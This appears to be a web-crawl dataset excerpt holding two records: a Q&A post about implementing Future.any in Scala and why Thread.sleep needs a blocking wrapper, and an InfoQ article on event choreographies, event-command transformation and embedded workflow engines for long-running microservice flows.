text
stringlengths
454
608k
url
stringlengths
17
896
dump
stringclasses
91 values
source
stringclasses
1 value
word_count
int64
101
114k
flesch_reading_ease
float64
50
104
I'm currently writing codes to extend the Future companion object. One function I want to implement is Any //returns the future that computes the first value computed from the list. If the first one fails, fail. def any[T](fs: List[Future[T]]): Future[T] = { val p = Promise[T]() fs foreach { f => { f onComplete { case Success(v) => p trySuccess v case Failure(e) => p tryFailure e } } } p.future } test("A list of Futures return only the first computed value") { val nums = (0 until 10).toList val futures = nums map { n => Future { Thread.sleep(n*1000); n } } val v = Await.result(Future.any(futures), Duration.Inf) assert(v === 0) } n*1000 (n+1)*1000 Thread.sleep is a blocking operation in your Future but you are not signaling to the ExecutionContext that you are doing so, so the behavior will vary depending on what ExecutionContext you use and how many processors your machine has. Your code works as expected with ExecutionContext.global if you add blocking: nums map { n => Future { blocking { Thread.sleep(n*1000); n } } }
https://codedump.io/share/Sum9Us5NuJoR/1/weird-behavior-of-scala-future-and-threadsleep
CC-MAIN-2017-09
refinedweb
176
57.87
enum size in C++ Here's a nice trick I figured out today. A lot of times I'll set up an enum in C++ and then I want to index an array with the symbols defined in the enum. So, let's say I want to use an array with one entry for each of the symbols in the enum, and I can allocate the array at compile time because I can look at my enum and count how many values there are. But maybe later I'll need to add a few values to that enum and then I'll forget to count how many there are! I'll get compilation errors! Here's what I can do instead of counting: Here's my enum: enum BigCats { TIGER, LIGER, LION, COUGAR, NUM_CATS }; Notice the NUM_CATS as the last element! Maybe I want to have an array of ints that represents how awesome I think each cat is. Now I can do this: int AwesomeCats[NUM_CATS] powershell script to print function here's a powershell script i worked up the other night. i do embedded programming at work with an ide that doesn't always search through a set of files correctly. so, i usually do it manually, and spend a lot of time in powershell searching through the code to find things. things like functions and junk. so, now instead of something like: grep functionName *.c, looking at the file name and line number and then going into the ide to open the file and see it, i'm just like: show-function functionName. WOW! # PS script to print out a function given the name # Nick Gamroth # May 2008 if($args[0] -eq $NULL) { echo "ERROR: no function name given" return } # here's a junky regex to search for function definitions $search = "[\w\s]" + $args[0] + "\(" # figure out what file the function is defined in # hopefully, this will only be 1 $match = get-childitem . --include *.c -recurse | select-string -list -pattern $search #$file = $match | select-object Filename $file = $match.Filename $line = $match.LineNumber # show the file starting at that line $count = (get-content $file | measure-object).Count $d = ($count - $line + 1) # get all the lines starting at the one we found the method start at $meth = get-content $file | select-object -last $d $done = 0 $braces = 0 $i = 0 $meth | foreach-object { $l = $_ echo $l if($_.Contains("`{")) { $braces++ } if($l.Contains("`}")) { $braces-- } if($braces -eq 0) { # make sure we get past the first line if($i -gt 1) { break } } $i++ } Science Time! I just remembered that I used to have some math/science related notes on this site before the redesign. These notes used to get a few Google searches, so I re-added them. I've even added some new stuff about discrete-time Fourier transforms! Science: It Works, Bitches! Coverflow ripoff Remember coverflow? Remember how it was so much better as a standalone app than it is as a part of iTunes? Yeah, me too, and I totally miss it. I had a few spare minutes today, so I put together an interface prototype of a clone: MAT Files From C Here's a tip: you can easily generate binary .mat files right from C/C++! I've been trying to do this for a really long time, but it turns out I wasn't reading the MATLAB documentation, which tells you just how to do it! #include "mat.h" // matlabroot\extern\include void main() { double array[] = {1,2,3,4,5,6,7,8,9}; mxArray *a = mxCreateDoubleMatrix(9, 1, mxREAL); memcpy(mxGetPr(a), array, 9 * sizeof(double)); MATFile *matfile = matOpen("matfile.mat", "w"); matPutVariable(matfile, "data", a); } You also need to link with libmat.lib, which is somewhere like :matlabroot\extern\lib\win32\microsoft\msvc60. AwesomeForm Wow, I wrote another CodeProject article!! This one is about a Form class I made that is translucent. It's not bad, but it could be better. I'll work on it some more undefined reference when linking library wow, i thought that i was totally screwed for a minute over here. i'm writing this program that uses a bunch of external libraries and one of them is the bluesoleil bluetooth SDK from IVT. it comes with a .lib that i was having a rough time linking with when using Qt Creator. every time i'd try and build the project, i'd get undefined reference errors for every function defined in that library. here's how i figured out what was going on: - used dumpbin /ALL to take a look at everything the lib was exporting - verified that the functions i was calling existed - noticed that function names in the lib were prepended with a '_' - !!! - noticed that the errors i were getting didn't have underscores - figured out that this library was using C, but my code was all C++ - used extern "C" { ... } around my header files this probably should have been obvious right away, but it's a hard problem to search for, and it gave me a rush when i figured it out. Average of a file of numbers in powershell I kind of like the idea of using powershell as a sort of MATLAB substitute for quick analysis of data. I had the opportunity to do that today since I ran some tests that resulted in a few files that were just lists of numbers. I was interested in the mean of all the numbers in each file, so I wrote this script: # mean.ps1 # calculates the mean of a set of numbers stored in a text file. each number # should be on it's own line. # Nick Gamroth $data = get-content $args write-host "Calculating mean of" $data.length "data points found in" $args $sum = 0 for ($i = 0 ; $i -le $data.length ; $i++) { $sum += [double]$data[$i] } $mean = $sum / $data.length $mean jabba the chatfest I've done some work in the interface prototype for my jabber client. It's going pretty well, but there are a lof of performance bugs to work out. Here's a screenshot: Of course, those goofy looking images are just test images. In use, they'd be pictures of other users. The exciting part about the interface is that when you switch users, the chat window "flips" over, to reveal the conversation you're having with another user on the back. I wrote a CodeProject article about that control. I made an entry here about it, but I must have managed to delete it from the database. It's New! I redesigned this site! I got some new shoes that are grey and orange, and I like the color combination so I used it for this site. It's a little bit halloween-ish, but it's not bad. Also, I learned how to use PHP and MySQL to create a database back-end. I'll probably post the source for it soon. It's really simple, so it'd probably be a good starting point for others who want to do something similar.
http://thebeekeeper.net/
CC-MAIN-2015-14
refinedweb
1,182
71.44
I just downloaded pyCharm v1.5.4, I went to this Jetbrains video - This has you start by creating a project, and writing a test... pretty straight forward. However, even though my code mimics what's on the screen, I keep getting "no tests were found" Here's the code: from unittest import TestCase class Conference(object): def get_talk_at(self, time): pass class ConferenceTest(TestCase): def test_empty(self): c = Conference() self.assertEqual(None,c.get_talk_at(10)) In the video he runs this with CTRL-SHFT-F10 (doesn't work on mine but I'd imagine that's just because which keyboard I chose) but if I go right-click the folder and select "Run Unittests in '...'" it runs, just nothing is found. On a side note, Is there a explicit declaration I can make on a test that says "hey this is a test", kinda like NUnits [TestFixture] or [Test]? How does pycharm/python determine what methods are tests? Okay, changed my Keymap in the settings to "Default", came back, used the CTRL-SHFT-F10 to run the tests, and something happened (test failed, but that's a different issue). However, going to the project, right clicking the folder, and selecting "Run unitests in .." option still shows "no tests were found" What's going on? I don't like that it's auto-magically happening with the keyboard press but not happening through the context menu... Any help would be appreciated. UPDATE: If I right click the .py file in the folder, it runs the tests, just like the CTRL-SHFT-F10 work. Not sure why the option from the folder level doesn't work Hi MikeM, This happens bacause of the name of the test file. Python unittests use "test.*" pattern to collect tests from the directory (). If you want to collect tests regardless test name – just check pattern checkbox in run configuration and write ".*" as pattern. Thanks for that. So putting in the pattern worked, regardless of file name. I'm assuming at that point it's just looking for any class that inherits unittest.case.TestCase? Yes, it works the same way as unittests and attaches nice tree view of results.
https://intellij-support.jetbrains.com/hc/en-us/community/posts/206590965-New-to-pyCharm-Getting-started-not-working
CC-MAIN-2020-10
refinedweb
364
73.88
Hi I am a begginner in java and have an assignment to simulate a Langton Ant. Would like some help where to start. package simulation; /** * * Simulation class * * */ public class Simulation { public int height ; public int width; public int antStartI; public int antStartJ; public String originalDirection; /* @param height - the height of the grid * @param width - the width of the grid * @param antStartI - the original I coordinate of the ant * @param antStartJ - the original J coordinate of the ant * @param originalDirection - the original direction the ant is facing */ public Simulation(int height, int width, int antStartI, int antStartJ, Direction originalDirection, int maxTimeSteps) { height = height; width = width; antStartI = antStartI; antStartJ = antStartJ; originalDirection = originalDirection; } /** * Execute a time step for the simulation. * * The ant must: * * move forward 1 space * - if this movement would cause it to move off the grid, * the simulation is completed. * * rotate depending on the state of the cell the ant is occupying * - if the cell is white, rotate left * - otherwise, rotate right * * change the state of the cell the ant is currently occupying * - if the cell is white, it becomes black * - otherwise, it becomes white * * NOTE: this method should do nothing if the simulation is completed. */ public void executeStep() { switch (direction) { case NORTH: ; break; case SOUTH: ; break; case EAST: ; break; case WEST: ; break; } } /** * Method to check if the simulation is completed. * * The simulation is completed if and only if: * * it has reached the maximum time steps allowed * * the ant has moved off the grid * * @return true - the simulation is completed * @return false - the simulation is not completed */ public boolean isCompleted() { // TODO fill in this method } /** * Method to return a copy of the current grid. * * You should always return a copy of an object if you do not * want your base object to be changed by any code calling this method. * * @return a clone of the grid. */ public Grid cloneCurrentGrid() { // TODO fill in this method } /** * Method to return a copy of the current ant. * * You should always return a copy of an object if you do not * want your base object to be changed by any code calling this method. * * NOTE: Do not canche this value, return a new object for every call. * * @return a clone of the ant. */ public Ant cloneCurrentAnt() { // TODO fill in this method } } I tried to write execute step but have know idea of hw to set the ant's next position regarding its direction. Any ideas?
http://www.javaprogrammingforums.com/object-oriented-programming/28031-lagnton-ant.html
CC-MAIN-2014-41
refinedweb
399
59.57
Report message to a moderator Hi all, I am also investigating OSGi and Virgo. As Ronald pointed out, it would be great to be able to have a modular system and hot-swap software-modules using a management console. I am working on a project which is built with Gradle and uses Spring + JPA + Hibernate (4.1.5) libraries. I am also using some other "standard" 3rd party libraries, e.g. - slf4j + log4j for Logging, - Jackson for JSON mapping and - Dozer for Java bean to bean mapping. In my project I have some modules which are deployed as web applications (war-files). Currently, I am using a Tomcat 7 to run them using the deploy/undeploy mechanism as a replacement for lifecycle management. These web applications (my "modules") talk to each other via HTTP (RESTful APIs). I have some basic questions on the topic of migrating this project to OSGi and Virgo: 1) Assuming all my modules are OSGi-fied: Will there be any advantages if I switch from RESTful communication between my modules to OSGi-Service-based communication? 2) I want to use Spring; Is it still possible to choose between the Spring-way of exporting OSGi services (e.g. via spring-osgi-context.xml with "beans"-namespace) and the Blueprint specification style (blueprint.xml with the "blueprint"-namespace)? Will the latter also work with Apache Aries? 3) Do I have to bundle (e.g. using bundlor) every 3rd party dependency manually if I cannot find the version I need/want in the SpringSource Enterprise Bundle Repository? 4) Is it true, that it is not straightforward to OSGi-fy the Hibernate libraries? 5) Do you have any experience with the Gradle OSGi plugin? Do I have to duplicate my dependency management effort, i.e. do I have to manage dependencies for the build using Gradle (build.gradle) and explicitly manage dependencies for OSGi (MANIFEST.MF) or is it properly generated by the plugin? 6) From your experience, would it be easier just to use - Maven instead of Gradle and - EclipseLink/OpenJPA instead of Hibernate (I read about some class-loading issues with Hibernate) in the "OSGi-world"?[ Any comments/suggestions/hints are highly appreciated Regards, Sönke
http://www.eclipse.org/forums/index.php/mv/msg/365218/890161/
CC-MAIN-2013-20
refinedweb
367
56.55
This is the mail archive of the gcc@gcc.gnu.org mailing list for the GCC project. --On Thursday, July 26, 2001 02:52:26 AM +0200 Marc Espie <espie@quatramaran.ens.fr> wrote: > In article <76410000.995505677@warlock.codesourcery.com> you write: >> We are nearing the pre-3.0.1 freeze. >> >> In particular, after midnight GMT - 0800 on July 21st, non-documentation >> check-ins on the branch will require my approval. I will make a release >> candidate at that time, for the planned August 1st release. > > I'm still waiting for approval on the following patch... > > > > which you should have in your mailbox already. Shoot -- I didn't remember to go back and deal with this message until now. The patch is OK. Since the late approval is my fault, we'll chance incorporating the patch. Go ahead and check it in on the mainline. On the branch, please do not do the configure.in change, and adjust the mathconf.h change to just do: #ifdef __OpenBSD__ #include <sys/types.h> #endif in the appropriate place. Ugly, but very safe, and safety first at this stage. Please test that to confirm it works. Please apply this patch ASAP and let me know when you have applied it. Then, I will respin. Thank you, -- Mark Mitchell mark@codesourcery.com CodeSourcery, LLC
http://gcc.gnu.org/ml/gcc/2001-08/msg00740.html
CC-MAIN-2018-09
refinedweb
221
79.77
: - Sometimes the type in the collection isn’t sufficiently distinctive, especially if it’s a built-in type. You’d like to see something like EmployeeIDCollection rather than List<int> - It’s often useful to add additional functionality to the collection beyond what you get from the built-in collection class.. Should I understand this post as if you don’t agree with <a href="">this blog post by Martin Fowler</a>? Best Regards, Jimmy ### ::well, actually, we couldn’t replace them, as that would break existing code And this is where I just turn around and cry. So, you leave all the buggy (yes, they DO have bugs) 1.0/1.1 generic lists in your code? This is pathetic. I want a clean workable .NET 2.0 DOnt start polluting the framework yet. You ahve a chance here. BREAK THE CODE, give me a better and less buggy framework. Eric, you’re making a good point here. However I think it’s realization is calling for having a typedef-kind of statement. I understand the reasons why typedef/define constructs are dislikable, but what about just having a shortened version of class declaration syntax where "{}" will not be required, i.e.: class EmployeeIDCollection: List<int>; instead of class EmployeeIDCollection: List<int>{} I just foresee myself creating alot of those "custom" classes that wont really add any new functionality to the base classes. Jimmy, I his blog entry, Martin says in relation to custom-typed collections "On the whole, however, it isn’t worth the trouble" If you have to write them by hand, or use some generator program, I agree with him. But if you don’t, then it’s fairly low effort to have a strongly-typed collection, and I think it has real advantages over a simple List<Employee>. This is specifically for the library design case. I’m not sure yet how I feel about what you should do with collections inside a component, as I haven’t thought about it a lot. My initial guess is that I will tend to use something like List<Employee> because it’s simpler. Martin also makes an interesting point about encapsulated collections, though I’m not sure how to reconcile his advice to use one vs. his early comment about just using a parameterized collection. Anyway, I think there are times that you’d want to have encapsulation, but there are also times where you want your classes to be more promiscuous, so to speak. Thomas, I sympathize with your comments – we all agree that the frameworks would be much nicer if we had had generics in the first version, and we wouldn’t have the ugliness of having multiple versions of collection classes. But I don’t think we can make changes that are likely to break existing code, and if we tried to back-patch generic lists into places where the user used a non-generic list, I think we would break a fair bit of code. I don’t think it’s unreasonable for users to want to recompile and not have this happen. If you want to get rid of the non-generic classes, you should be able to change your using statement and then fix things up by hand. It’s possible you’ll need to revisit some code, especially if you store value types in collections, as you don’t have a null value option in a generic collection that holds a value type. I’m late to this thread, but I’m bored so I’m perusing the archives. Would a possible solution to the break/don’t break question be to keep the existing System.Collections types defined as they are but move them out of mscorlib? Then if you want the old ones you can add a reference and be on your way, the new version stays consistent, and we don’t need a (crufty) System.Collections.Generic namespace. I’m sure there’s a problem with this idea (maybe related to the GAC and versioning policy?). Will System.Collections.ArrayList at least be marked as [Obsolete] in version 2? And a related question, what is the CLS policy with respect to generics? [][][][][][][][][][][][][][][][][][][] PingBack from PingBack from
https://blogs.msdn.microsoft.com/ericgu/2003/09/04/generics-and-object-collections/
CC-MAIN-2017-09
refinedweb
709
61.56
Know the Flow! Microservices and Event Choreographies - | - - - - - - Read later Reading List Key Takeaways - In a microservices architecture it is not uncommon to encounter services which are long running and stretch across the boundary of individual microservices. - Event based architectures with corresponding choreographies are one increasingly common way this can be handled, and typical decrease coupling. - Central to the idea is that all microservices will publish events when something of business relevance happens inside of them which other services can subscribe to. This might be done using asynchronous messaging or perhaps as a REST service. - The article authors explore a pattern they call “event command transformation” as a way of reasoning about these cross-cutting concerns avoiding central controllers. - For implementing the flow you can leverage existing lightweight state machines and workflow engines. These engines can be embedded into your microservice, avoiding any central tool or central governance. Let's assume we want to design a microservices architecture to implement some reasonably complex "end-to-end" use case, e.g. the order fulfillment of a web based retailer. Obviously, this will involve multiple microservices. Consequently, we have to deal with managing a business process that stretches across the boundary of individual services. But when reaching out for nicely decoupled microservices, some challenges arise related to such cross-service flows. In this article, we will therefore introduce helpful patterns as the “event command transformation” and present technology approaches to tackle the complexity of coding flows stretching across microservices –without introducing any central controller. First, we have to come up with an initial microservice landscape and define the boundaries of microservices and their scope. Our goal is to minimize coupling between various services and keep them independently deployable. By doing so we want to maximize the autonomy of the teams; for every microservice there should be one cross-functional team taking care of it. As this is particularly important for us, we decided to follow a more coarse-grained approach and design just a few self-contained services built around business capabilities. This results in the following microservices: - Payment Service – the team is responsible for dealing with everything related to "money" - Inventory Service – the team is responsible for taking care of stock items - Shipment Service – the team is responsible for "moving stuff to customers" The web shop itself will probably be comprised of several more microservices, e.g. Search, Catalogue etc. As we focus on the order fulfillment, we are only interested in one web shop related service that allows the customer to place an order: - Checkout Service - the team deals with checking out the customers shopping cart This service will ultimately trigger the order fulfillment to start. Long Running Flows We have to consider one important characteristic of the overall order fulfillment: it is a long running flow of actions to be carried out. Referring to the term “long running”, we mean that it can take minutes, hours or even weeks until the order processing is complete. Consider the following example: whenever a credit card is rejected during payment, the customer has one week to provide new payment details. That means the order might have to wait for one week. The implications of such long running behavior poses requirements on the implementation approach which we will discuss in greater detail in this article. Event Collaboration We do not discuss the pros and cons of communication patterns in this article, but rather decided to illustrate our topic by means of an event centric communication pattern in between services. Central to the idea of event collaboration is that all microservices will publish events when something business relevant happens inside of them. Other services may subscribe to that event and do something with it, e.g. store the associated information in a form optimal for their own purposes. At some later point in time, a subscribing microservice can use that information to carry out its own service without being dependent on calling other services. Therefore, with event collaboration a high degree of temporal decoupling in between services becomes a default. Furthermore, it becomes easy and natural to achieve the kind of decentral data management we look for in a microservices architecture. The concept is well understood in Domain Driven Design, a discipline currently accelerating in the slipstream of microservices and the "new normal" of interacting, distributed systems in general. Note that event collaboration could be implemented with asynchronous messaging but could also be implemented by other means. Microservices could e.g. publish REST based feeds of their events which could be consumed by other services on a regular basis. Event Command Transformation Our order fulfillment starts with the event Order Placed. The first thing that must happen in our minimum viable order fulfillment is the customer's payment. The payment service successfully finishes with the event Payment Received after which we take care of consignment of the goods in the stock (Goods Fetched) and the shipping to the customer (Goods Shipped). So we have a clear flow of events - at least in the "happy" scenario. One could now easily create a chain of events as depicted in Figure 1. Figure 1: Each of the microservices is listening to the previous one in the chain As much as we support the fundamental idea of event collaboration, these types of event chains provide a suboptimal approach for implementing the end-to-end logic of whole business processes. We see it happen for the noble goal of reducing coupling but these solutions might even increase coupling. Let’s dive into that. An event is by definition meant to inform you about a relevant fact that occurred and that some other service might be interested in. But the moment we require a service to follow up on an event, we use that event as if it had the semantical meaning of a command. The consequence of this: we end up with tighter coupling than necessary. In our example, the payment service listens to the event Order Placed in the checkout service. Now the payment service has to know at least something about checkouts. But it’s better if it doesn’t for the following reasons: - Consider that our organization probably needs payment services for various reasons and not just when retail orders are placed. The payment service would have to be adjusted and redeployed whenever we want to bind the payment service to a new event even though the specifics of how exactly payments are carried out do not change at all. - Consider simple business requirements like changing the order of some steps. If the business wishes to make sure that goods are correctly fetched before the customer is charged, three services would have to be adjusted at the same time: Payment now listens to Goods Fetched, while Inventory listens to Order Placed and shipment now subscribes to Payment Received. - Consider we issue invoices for special orders, e.g. for VIP customers. Now, not only does the payment service have to understand the rule as it needs to decide if the payment has to be done whenever an order is placed, but also the inventory service has to understand that just listening to Payment Received events will bring the overall process for VIPs to a halt! Therefore, we recommend what we call the event command transformation pattern. Make sure that the component responsible to make a business decision (payment is needed now) transforms an event (Order Placed) into a command (Retrieve Payment). The command can be sent to the receiving service (payment) without the service knowing about the client, nor realizing the above disadvantages. Note that "issuing commands" for long running flows does not necessarily mean to make use of request/reply oriented protocols. It can also be implemented by other means. Microservices could listen to asynchronous command messages in a similar way they already listen to events. Furthermore, note that event command transformation also takes place when the event subscriber transforms an event to an internal command. We recommend the transformation to be made by the party responsible for making the decision that “something needs to happen.” But who is that party in our example? Should the checkout service issue the Retrieve Payment command? No. Reconsider the change scenarios given above. All of them suggest that we need a separate microservice handling some of the end-to-end logic of the order fulfillment. - Order - the team is responsible for dealing with the end-to-end logic of the customer facing core capability of the business - fulfilling orders. This service does the event command transformation. It transforms Order Placed into Retrieve Payment. It might decide autonomously to do that for Non-VIP customers only. It might also consult another microservice first which encapsulates the rules for what constitutes a VIP customer. Such an end-to-end service improves decoupling massively when being compared to a puristic event collaboration as described. But, how can we avoid that the mere fact of introducing an end-to-end service will result in a "God-like" service holding most of the crucial business logic and delegating to "anemic" (CRUD) services? As this would eliminate a lot of benefits of event choreographies, God services are not recommended by many authors like e.g. Sam Newman in Building Microservices. Furthermore, isn’t a commanding service using the orchestration principle which is perceived as the enemy of loose coupling? Choreography vs. Orchestration - Decentral Governance for Business Processes Avoiding God services and central controllers is a question of taking the responsibilities and autonomy of the teams seriously. Having end-to-end responsibility for an order in a highly decentral organization does not mean that you constantly interfere with the responsibilities of other teams like e.g. payment, on the contrary! Having the end-to-end responsibility for orders will mean that "payment" is a black box for you. You are only in charge of asking it to perform its work (Retrieve Payment) and wait for its completion: Payment Received. Consider the previously mentioned business requirement that whenever a credit card is rejected, the customer has one week to provide new payment details. We could be tempted to implement such logic in the order service but only if the commands offered by the payment service are very fine-grained. If the payment team takes its own business capabilities and associated responsibilities seriously, it will determine that it’s responsible to collect payments even if this potentially takes longer than just attempting to charge a credit card. The payment team can guard against any God-like service tendencies by providing a few coarse-grained, potentially long running capabilities instead of a myriad of fine-grained or even CRUD-like functions. This idea is depicted in Figure 2. Figure 2: End-to-end flow logic is decentrally governed, the responsibilities are distributed In a highly decentral organization, the end-to-end order service will be as lean as possible because most aspects of its end-to-end process will be managed autonomously by other services specializing in their own business capability. The payment service serves as an example for that principle: it's the responsibility of the payment team to implement everything necessary to collect the payment. This is a crucial aspect to consider and a common misconception when talking about the implementation of business processes: it does not necessarily mean that you design the overall process in one piece and let a central orchestrator carry it out, like it was advertised in the old SOA and BPM days. The ownership for the process and the needed flow logic can be distributed. How much will primarily depend on your organizational structure which should also be reflected in your service landscape (see Conway’s Law). Following this approach, you do not end up with a central, monolithic controller. If you now think that splitting up the end-to-end flow logic increases the complexity of your system you might be right. Similar trade-offs apply to introducing a microservices architecture in the first place: Monolithic approaches are often easier but will reach their limits when the system grows and can no longer be handled by one single team. It's just about the same with flow logic. To sum up what we discussed so far: choreography is a fundamental pattern for a microservices architecture. We recommend following that pattern as an important rule of thumb. But when it comes to business processes, don’t create puristic event chains but implement decentral flow logic and use the event command transformation pattern instead. The microservice responsible to decide an action should also be responsible to transform an event into a command. Flow Logic Implementation Let’s look at the implementation of long running flow logic. Long running flows require their state to be saved, as you might have to wait an arbitrary time. State handling is not a new thing to do. That’s what databases are for. So an easy approach is to store the order state as part of some entity, e.g. as shown in Code Snippet 1. public class OrderStatus { boolean paymentReceived = false; boolean goodsFetched = false; boolean goodsShipped = false; } Code Snippet 1: A simplified order status to be used as part of some entity Or you might use your favorite actor framework. We discuss basic options here. All of this works to some extent but typically you face additional requirements as soon as you start with implementing the states needed for long running behavior: how can you implement waiting for seven days? How can you handle errors and retries? How can you evaluate cycle time for orders? Under which circumstances do orders get canceled because of missing payments? How can I change the flow if I always have some orders somewhere in the processing line? This can lead to a lot of coding which ends up in a home-grown framework. And teams working on affected projects complain as an enormous amount of effort is buried. So we want to have a look at a different approach: leveraging existing frameworks. In this article, we use the open source engine from Camunda to illustrate concrete code examples. Let's have a look at Code Snippet 2. engine.getRepositoryService().createDeployment() .addModelInstance(Bpmn.createExecutableProcess("order") .startEvent() .serviceTask().name("Retrieve payment").camundaClass(RetrievePaymentAdapter.class) .serviceTask().name("Fetch goods").camundaClass(FetchGoodsAdapter.class) .serviceTask().name("Ship goods").camundaClass(ShipGoodsAdapter.class) .endEvent().camundaExecutionListenerClass("end", GoodsShippedAdapter.class) .done() ).deploy(); Code Snippet 2: The order flow can be expressed in code, e.g. by using Java The engine now runs instances of this flow, keeps track of their state and stores it in a persistent way mitigating disaster or long periods of waiting. The missing adapter logic can be easily coded, too, as shown in Code Snippet 3: public class RetrievePaymentAdapter implements JavaDelegate { public void execute(ExecutionContext ctx) throws Exception { // Prepare payload for the outgoing command publishCommand("RetrievePayment", payload); addEventSubscription("PaymentReceived", ctx); } } Code Snippet 3: Additional logic needed can be coded with adapters, e.g. by using Java Such an engine can also handle more complex requirements. The following flow catches all errors when charging the credit card. The flow moves forward in an alternative way and asks the customer to update their details. As we don’t know if and when the customers will do that, we then have to wait for an incoming message from them (or technically speaking most probably from some UI or other microservice). But we wait only for seven days and then we automatically end the flow and issue a Payment Failed event. Compare Code Snippet 4. Bpmn.createExecutableProcess("payment") .startEvent() .serviceTask().id("charge").name("Charge credit card").camundaClass(ChargeCreditCardAdapter.class) .boundaryEvent().error() .serviceTask().name("Ask customer to update credit card").camundaClass(AskCustomerAdapter.class) .receiveTask().id("wait").name("Wait for new credit card data").message("CreditCardUpdated") .boundaryEvent().timerWithDuration("PT7D") // time out after 7 days .endEvent().camundaExecutionListenerClass("end", PaymentFailedAdapter.class) .moveToActivity("wait").connectTo("charge") // retry with new credit card data .moveToActivity("charge") .endEvent().camundaExecutionListenerClass("end", PaymentCompletedAdapter.class) .done(); Code Snippet 4: The flow logic now allows for a time frame of a week to update credit card data We will point to some other potentially interesting aspects later in this article, e.g. to visualize such flows. For now, we summarize that you can leverage such a state machine to handle your state and define powerful flows around state transitions. Embeddable Workflow Such a state machine is a simple library that can be embedded into your microservice. In the source code examples provided in this article, you can see an example of how to start the Camunda engine as part of a microservice implemented in Java which could be also done via Spring Boot or similar frameworks. Let’s highlight this: every microservice that implements long running flows must tackle the requirements around flow and state handling. So, should every microservice use an engine like Camunda's? The team responsible for a microservice may decide to, but such a decision will not necessarily be the same across all teams. In a microservices architecture we typically find decentral governance regarding technological choices. A team might very well use a different framework or even decide to hardcode their flows. Or they use the same framework but in different versions. There isn’t necessarily any central component involved when you introduce a workflow engine. We clearly advocate to not undertake unnecessary enterprise architecture standards in a microservice environment. Embeddable doesn’t have to mean that you run the engine yourself, especially in the polyglot world of microservices the programming language might not directly fit. Then you can also deploy your engine in a standalone manner and talk remotely to it. This could e.g. be done via REST but more efficient ways are also available on the horizon. The important aspect here is that the responsibility of the engine lives with the team owning the surrounding microservice; it’s not a centrally provided engine (Figure 3). Figure 3: Teams decide decentrally to leverage and embed an engine for their flow logic - or not In the proposed decentralized architecture you have multiple workflow engines where every single one only sees a part of the overall flow. That poses new requirements on proper process monitoring which aren’t yet solved. But depending on the product there are workarounds possible or you can leverage existing monitoring tools in your microservice universe (like the Elastic stack for example). Therefore, it also helps to introduce an artificial transaction id or trace id which you hand over to each and every service invocation in the chain. We plan to write a blog post dedicated to this topic as this is especially important in the more complex operational environment of collaborating microservices. The Power of Graphics “I love code, and I love DSLs. Graphic UIs are terrible“ – a statement we often hear when talking to developers. It’s understandable because very often graphical models hinder the way developers like to work by what we call “death-by-properties-panel.” The models might also hide complex configurations made under the hood. But this aversion should not stand in the way of an important fact: graphical representations are extremely handy during operations as you don’t have to dig into code to understand the current state or exceptional situations. And you can leverage the graphics to discuss the model with business stakeholders, requirements engineers, operators, or other developers. Often after discussing and modeling a flow (graphically) in a short workshop, we hear comments like “now I finally understood what we already do for years!” Visibility also makes it easier to change flows down the line as you know how it’s currently implemented (don’t forget, the flow is running code) and you can easily point to areas where it should be changed. With workflow engines you can get a graphical representation of the flow. However, we often see one very important aspect missing: being able to define flows not only in a graphical format but also in code or by a simple DSL as shown above. The code example we gave above can be presented in auto-layout and monitored as shown in the figure below. Many projects we know use graphical models as it’s often easier to follow. It comes especially in handy if you have complex flows including parallel paths which are hard to understand in code but easy to spot in the graphics. The graphical model is often directly saved in the BPMN 2.0 standard. But we also know of projects using the coded DSL successfully. (Click on the image to enlarge it) Figure 4: The power of graphics - from business users to developers to operations When building your own end-to-end monitoring solution, you can still easily visualize a graphical flow with lightweight JavaScript frameworks like bpmn.io as we demonstrate in the code examples. You just read the process models and their current states from different engines via an API and show all running instances for the already mentioned artificial transaction id. The granularity of the flows shown in monitoring should reflect the event collaborations we introduced earlier which correspond to events being meaningful for the domain expert. That makes these flows readable for all kinds of project participants. The flow should actually be seen as part of the domain logic and centered around the ubiquitous language as promoted by DDD. “When exactly do we do the payment?” is then easy to answer for everybody – from business users to developers to operations. Handle Complex Flow Requirements As we all know: the devil is in the details. As soon as we leave the cozy island of one single microservice we don’t have atomic transactions at hand, experience latency and "eventual consistency" and have to do remote communication with potentially unreliable partners. Developers therefore have to deal with failures a lot - also in regards to business transactions which can’t be carried out by atomic transactions. There is a lot of power in workflow engines for these uses cases, especially when using a BPMN tool as introduced. We give an example in Figure 5, using the graphical format this time. We catch the error that goods are not available and trigger a so-called compensation. The compensation mechanism of the engine knows which activities were successfully executed in the past and will automatically execute defined compensation activities, Refund payment in this case. One can leverage this functionality which nicely implements the so-called Saga pattern. (Click on the image to enlarge it) Figure 5: In case the ordered goods turn out no to be available, the payment is refunded Note that the shown logic still lives inside a (potentially very lean) service, the Order Service, whereas other parts of the overall flow will be maintained by the teams responsible for those parts. There is no need for any central controller – the flow logic is distributed. Why are State Machines not Commodity for Microservices then? Existing tools providing flow logic capabilities needed for long-running services are often named workflow or BPM engines. However, there were errors made around Business Process Management (BPM) in “the old SOA days” which give it a bad reputation especially among developers. They think they get an inflexible, monolithic, developer-adverse and expensive tool which forces them to follow some model-driven, proprietary, zero-code approach. And some BPM vendors really deliver platforms which are not usable in the microservices universe. But it’s important to note that there are lightweight open source engines available which provide an easy-to-use, embeddable state machine as shown above. You can leverage these tools to handle the flow instead of re-inventing the wheel, saving you time, a very precious commodity as we all know. One important aspect to overcome misconceptions is to take wording seriously. The flows we present here are not necessarily “business processes”, particularly if you “just” want to have a bunch of collaborating microservices forming a business transaction. The flows may also not be “workflows” as this is often perceived of involving humans to do some manual work. That’s why we often just talk about “flows” – which works fine for different use cases and different stakeholders. Example code The use case presented here is not just pure theory. In order to make concepts concrete and explainable we developed the order fulfillment example as working system composed of multiple microservices. You find the source code online on GitHub. Conclusions Microservices and event driven architectures go very well together. Event choreographies enable decentral data management, typically decreasing coupling and work well for the kind of long running "background" processes we focus on in this article. Most of the end-to-end flow logic required to support long running business processes should be distributed across the microservices. Every microservice implements the part of the flow it’s responsible for, according to its own business capabilities. We recommend transforming events to commands inside the services responsible for the business decision that something is needed and therefore needs to happen. A service responsible for a remaining end-to-end logic can be as lean as possible, but it's in our mind better to have one than relying on non-transparent and tightly coupled event chains. For implementing the flow you can leverage existing lightweight state machines and workflow engines. These engines can be embedded into your microservice, avoiding any central tool or central governance. You can see them as a library helping the developer. As a bonus, you get graphical representations of the flow helping you throughout your project. You might have to overcome some common misconceptions about workflow or BPM in your company but believe us, it’s worth it! About the Authors Bernd Rücker helped many customers to implement business logic centered around long running flows, for example the order fulfillment process of the rapid growing start-up Zalando selling clothes worldwide or the provisioning process for e.g. SIM cards at a couple of big telecommunication companies. 